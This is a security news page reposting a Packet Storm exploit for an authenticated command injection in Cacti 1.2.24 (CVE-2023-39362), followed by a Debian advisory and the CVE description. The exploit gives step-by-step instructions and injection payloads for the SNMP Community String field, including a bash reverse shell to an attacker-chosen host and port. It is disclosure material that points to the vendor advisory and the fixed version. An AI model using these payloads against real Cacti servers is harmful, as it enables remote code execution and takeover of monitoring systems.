Security
Headlines
HeadlinesLatestCVEs

Headline

Cacti 1.2.24 Command Injection

Cacti version 1.2.24 authenticated command injection exploit that uses SNMP options.

Packet Storm
#vulnerability#web#apache#git#php#rce#auth#dell#docker#sap
# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options# Date: 2023-07-03# Exploit Author: Antonio Francesco Sardella# Vendor Homepage: https://www.cacti.net/# Software Link: https://www.cacti.net/info/downloads# Version: Cacti 1.2.24# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container# CVE: CVE-2023-39362# Category: WebApps# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application# Vulnerability discovered and reported by: Antonio Francesco Sardella=======================================================================================Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)=======================================================================================-----------------Executive Summary-----------------In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.-------Exploit-------Prerequisites:    - The attacker is authenticated.    - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".    - A Device that supports SNMP can be used.    - Net-SNMP Graphs can be used.    - snmp module of PHP is not installed.Example of an exploit:    - Go to "Console" > "Create" > "New Device".    - Create a Device that supports SNMP version 1 or 2.    - Ensure that the Device has Graphs with one or more templates of:        - "Net-SNMP - Combined SCSI Disk Bytes"        - "Net-SNMP - Combined SCSI Disk I/O"        - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)    - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:        public\' ; touch /tmp/m3ssap0 ; \'    - Click the "Create" button.    - Check under /tmp the presence of the created file.To obtain a reverse shell, a payload like the following can be used.    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).----------Root Cause----------A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).----------References----------    - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp    - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html    - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Related news

Debian Security Advisory 5550-1

Debian Linux Security Advisory 5550-1 - Multiple security vulnerabilities have been discovered in Cacti, a web interface for graphing of monitoring systems, which could result in cross-site scripting, SQL injection, an open redirect or command injection.

CVE-2023-39362: Authenticated command injection when using SNMP options

Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution